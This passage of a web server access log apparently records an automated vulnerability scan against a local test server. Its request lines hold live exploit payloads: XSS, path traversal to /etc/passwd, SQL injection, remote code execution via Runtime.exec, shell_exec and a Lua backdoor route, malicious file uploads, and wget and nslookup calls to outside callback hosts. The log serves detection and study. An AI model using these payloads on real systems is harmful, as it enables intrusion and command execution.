(KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20ca2tuc8smpv1g2s80ca0mr1u5acqdjibj.oast.pro%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/36 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://ca2tuc8smpv1g2s80ca0h7ojkrqf74657.oast.pro; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.485","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/37 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yarn.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/29N5Etdc4w3BiUfJD7mTFTKCg5j\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/38 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", 